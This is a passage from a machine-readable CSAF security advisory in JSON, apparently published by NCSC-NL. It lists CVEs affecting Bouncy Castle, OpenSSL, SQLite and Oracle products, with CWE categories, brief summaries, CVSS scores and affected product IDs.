"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-29857 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-2024-29857.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2024-29857"
},
{
"cve": "CVE-2024-30171",
"cwe": {
"id": "CWE-208",
"name": "Observable Timing Discrepancy"
},
"notes": [
{
"category": "other",
"text": "Observable Timing Discrepancy",
"title": "CWE-208"
},
{
"category": "other",
"text": "Observable Discrepancy",
"title": "CWE-203"
},
{
"category": "description",
"text": "Multiple vulnerabilities across Oracle Utilities, WebLogic Server, and Bouncy Castle libraries allow for denial of service attacks and sensitive data leakage through timing side-channel exploits.",
"title": "Summary"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-30171 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-2024-30171.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2024-30171"
},
{
"cve": "CVE-2024-30172",
"cwe": {
"id": "CWE-835",
"name": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)"
},
"notes": [
{
"category": "other",
"text": "Loop with Unreachable Exit Condition (\u0027Infinite Loop\u0027)",
"title": "CWE-835"
},
{
"category": "other",
"text": "Improper Input Validation",
"title": "CWE-20"
},
{
"category": "description",
"text": "Multiple vulnerabilities across Oracle Utilities Application Framework, WebLogic Server, and Business Intelligence Enterprise Edition, as well as Bouncy Castle libraries, allow unauthenticated attackers to induce denial of service, with CVSS scores of 7.5 for Oracle products.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-30172 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-2024-30172.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2024-30172"
},
{
"cve": "CVE-2024-41996",
"cwe": {
"id": "CWE-295",
"name": "Improper Certificate Validation"
},
"notes": [
{
"category": "other",
"text": "Improper Certificate Validation",
"title": "CWE-295"
},
{
"category": "description",
"text": "A vulnerability in the Diffie-Hellman Key Agreement Protocol in OpenSSL allows remote attackers to cause excessive server-side computational load by exploiting public key order validation with approved safe primes, addressed in updates fixing CVE-2023-50782 and CVE-2024-41996.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:H/AT:N/PR:N/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2024-41996 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2024/cve-2024-41996.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
}
],
"title": "CVE-2024-41996"
},
{
"cve": "CVE-2025-6965",
"cwe": {
"id": "CWE-197",
"name": "Numeric Truncation Error"
},
"notes": [
{
"category": "other",
"text": "Numeric Truncation Error",
"title": "CWE-197"
},
{
"category": "description",
"text": "Critical vulnerabilities in Oracle Communications Cloud Native Core Unified Data Repository and Oracle Siebel CRM Cloud Applications allow unauthenticated attackers full system compromise, while multiple SQLite-related flaws affect various products including NetApp and Apple software, causing memory corruption and integer truncation issues.",
"title": "Summary"
},
{
"category": "general",
"text": "CVSS:4.0/AV:N/AC:H/AT:P/PR:L/UI:N/VC:L/VI:H/VA:L/SC:L/SI:H/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:N/R:U/V:D/RE:L/U:Green",
"title": "CVSSV4"
}
],
"product_status": {
"known_affected": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
"CSAFPID-41",
"CSAFPID-42",
"CSAFPID-43",
"CSAFPID-44",
"CSAFPID-45",
"CSAFPID-46",
"CSAFPID-47",
"CSAFPID-48",
"CSAFPID-49",
"CSAFPID-50",
"CSAFPID-51",
"CSAFPID-52",
"CSAFPID-53",
"CSAFPID-54",
"CSAFPID-55",
"CSAFPID-56",
"CSAFPID-57",
"CSAFPID-58",
"CSAFPID-59",
"CSAFPID-60",
"CSAFPID-61",
"CSAFPID-62",
"CSAFPID-63",
"CSAFPID-64",
"CSAFPID-65",
"CSAFPID-66",
"CSAFPID-67",
"CSAFPID-68",
"CSAFPID-69",
"CSAFPID-70",
"CSAFPID-71",
"CSAFPID-72",
"CSAFPID-73",
"CSAFPID-74",
"CSAFPID-75",
"CSAFPID-76",
"CSAFPID-77",
"CSAFPID-78",
"CSAFPID-79",
"CSAFPID-80",
"CSAFPID-81",
"CSAFPID-82",
"CSAFPID-83",
"CSAFPID-84",
"CSAFPID-85",
"CSAFPID-86",
"CSAFPID-87",
"CSAFPID-88",
"CSAFPID-89",
"CSAFPID-90",
"CSAFPID-91",
"CSAFPID-92",
"CSAFPID-93",
"CSAFPID-94",
"CSAFPID-95",
"CSAFPID-96",
"CSAFPID-97",
"CSAFPID-98",
"CSAFPID-99",
"CSAFPID-100",
"CSAFPID-101",
"CSAFPID-102",
"CSAFPID-103",
"CSAFPID-104",
"CSAFPID-105",
"CSAFPID-106",
"CSAFPID-107",
"CSAFPID-108",
"CSAFPID-109",
"CSAFPID-110",
"CSAFPID-111",
"CSAFPID-112",
"CSAFPID-113",
"CSAFPID-114",
"CSAFPID-115",
"CSAFPID-116",
"CSAFPID-117",
"CSAFPID-118",
"CSAFPID-119",
"CSAFPID-120",
"CSAFPID-121",
"CSAFPID-122",
"CSAFPID-123",
"CSAFPID-124",
"CSAFPID-125",
"CSAFPID-126"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-6965 | NCSC-NL Website",
"url": "https://vulnerabilities.ncsc.nl/csaf/v2/2025/cve-2025-6965.json"
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"CSAFPID-1",
"CSAFPID-2",
"CSAFPID-3",
"CSAFPID-4",
"CSAFPID-5",
"CSAFPID-6",
"CSAFPID-7",
"CSAFPID-8",
"CSAFPID-9",
"CSAFPID-10",
"CSAFPID-11",
"CSAFPID-12",
"CSAFPID-13",
"CSAFPID-14",
"CSAFPID-15",
"CSAFPID-16",
"CSAFPID-17",
"CSAFPID-18",
"CSAFPID-19",
"CSAFPID-20",
"CSAFPID-21",
"CSAFPID-22",
"CSAFPID-23",
"CSAFPID-24",
"CSAFPID-25",
"CSAFPID-26",
"CSAFPID-27",
"CSAFPID-28",
"CSAFPID-29",
"CSAFPID-30",
"CSAFPID-31",
"CSAFPID-32",
"CSAFPID-33",
"CSAFPID-34",
"CSAFPID-35",
"CSAFPID-36",
"CSAFPID-37",
"CSAFPID-38",
"CSAFPID-39",
"CSAFPID-40",
